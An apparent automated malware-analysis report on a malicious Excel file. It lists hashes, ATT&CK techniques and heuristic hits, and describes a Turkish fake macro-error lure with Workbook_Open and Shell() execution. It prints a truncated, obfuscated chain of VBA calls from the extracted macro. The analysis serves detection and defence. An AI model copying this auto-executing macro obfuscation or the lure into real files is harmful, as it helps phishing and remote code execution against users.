Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8abcb3084bb72c1c…

MALICIOUS

Office (OLE)

132.0 KB Created: 2017-08-23 04:46:09 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: fe0717b3bb396e0ed48725178eaa0d5e SHA-1: 47dcf95d8377d714127b364e40291b937fe27f3b SHA-256: 8abcb3084bb72c1cb49aebaf0a0c221a40538a062a1b8830c1b48d913211a403
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an Excel file containing a Workbook_Open VBA macro that uses the Shell() function, indicating an attempt to execute arbitrary code. The document body displays a fake "Microsoft Office Macro Error" message in Turkish, prompting the user to enable macros, which is a common social engineering tactic. The presence of the Shell() call and the Workbook_Open auto-execution strongly suggests the macro is designed to download and execute a second-stage payload.

Heuristics 6

  • ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35868 bytes
SHA-256: bd9d7f0f71ec0c5bfa2d0efbded1b9c964c4453b9beeb3d0983e0ee9878df23a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kurban2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Kurban1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub worKbook_oPen(): Call VsPCK: End Sub
Static Sub VsPCK()
Call OIGnB
End Sub
Static Function OIGnB() As Integer
Call tEoIO
End Function
Sub tEoIO()
Call YzWdb
End Sub
Function YzWdb()
Call DvDyo
End Function
Static Sub DvDyo()
Call wLuje
End Sub
Static Function wLuje() As Date
Call bGcEr
End Function
Static Sub bGcEr()
Call GCKZE
End Sub
Static Function GCKZE() As Boolean
Call lxstR
End Function
Sub lxstR()
Call QtZOe
End Sub
Sub QtZOe()
Call JJQzV
End Sub
Static Sub JJQzV()
Call oEyUi
End Sub
Static Function oEyUi() As Long
Call UAgpv
End Function
Static Sub UAgpv()
Call zvNKI
End Sub
Static Sub zvNKI()
Call sMEvz
End Sub
Static Function sMEvz() As String
Call XHmQM
End Function
Sub XHmQM()
Call rOvhK
End Sub
Private Function rOvhK() As Boolean
Call WJcCX
End Function
Static Function WJcCX() As Currency
Call BFKXk
End Function
Sub BFKXk()
Call uVBIb
End Sub
Sub uVBIb()
Call ZRjdo
End Sub
Function ZRjdo() As Double
Call FMQyB
End Function
Sub FMQyB()
Call kHyTO
End Sub
Function kHyTO() As Long
Call dYpEF
End Function
Static Sub dYpEF()
Call ITXYS
End Sub
Function ITXYS() As Integer
Call nPFtf
End Function
Sub nPFtf()
Call SKmOs
End Sub
Function SKmOs()
Call xFUjF
End Function
Sub xFUjF()
Call qWLUw
End Sub
Function qWLUw() As Object
Call VRtpJ
End Function
Private Sub VRtpJ()
Call ANaKV
End Sub
Function ANaKV() As Boolean
Call fIIei
End Function
Sub fIIei()
Call KDqzv
End Sub
Function KDqzv() As Byte
Call DUhkm
End Function
Function DUhkm() As Byte
Call iPPFz
End Function
Sub iPPFz()
Call NLwaM
End Sub
Function NLwaM() As Currency
Call tGevZ
End Function
Static Function tGevZ() As String
Call lWVgQ
End Function
Function lWVgQ() As String
Call RSDBd
End Function
Sub RSDBd()
Call wNkVq
End Sub
Function wNkVq() As Variant
Call bJSqD
End Function
Sub bJSqD()
Call GEALQ
End Sub
Function GEALQ() As Integer
Call zUrwH
End Function
Static Sub zUrwH()
Call eQZRU
End Sub
Function eQZRU() As Single
Call JLGmh
End Function
Sub JLGmh()
Call oHoHu
End Sub
Function oHoHu() As Single
Call hXfsk
End Function
Sub hXfsk()
Call MTNNx
End Sub
Function MTNNx() As Date
Call dRhcP
End Function
Sub dRhcP()
Call tzWTk
End Sub
Private Sub tzWTk()
Call XDVbi
End Sub
Private Sub XDVbi()
Call BGTig
End Sub
Private Function BGTig() As Date
Call eJRqe
End Function
Static Function eJRqe() As Date
Call urGhy
End Function
Static Sub urGhy()
Call YvEox
End Sub
Static Sub YvEox()
Call odtfR
End Sub
Sub odtfR()
Call SgsnP
End Sub
Sub SgsnP()
Call wkquN
End Sub
Sub wkquN()
Call anoBL
End Sub
Sub anoBL()
Call DqmJK
End Sub
Function DqmJK() As Integer
Call htkQI
End Function
Function htkQI() As Long
Call LxiYG
End Function
Function LxiYG() As Currency
Call bfYPa
End Function
Function bfYPa() As Boolean
Call FiWWY
End Function
Function FiWWY() As Object
Call imUeW
End Function
Function imUeW() As Integer
Call MpSlV
End Function
Sub MpSlV()
Call qsQtT
End Sub
Sub qsQtT()
Call UvOAR
End Sub
Sub UvOAR()
Call keDrl
End Sub
Sub keDrl()
Call OhCyj
End Sub
Sub OhCyj()
Call rkAGi
End Sub
Sub rkAGi()
Call VnyNg
End Sub
Function VnyNg() As Double
Call zrwVe
End Function
Function zrwVe() As Byte
Call duucc
End Function
Function duucc() As Single
Call tcjTw
End Function
Function tcjTw()
Call Wgibv
End Function
Function Wgibv() As Variant
... (truncated)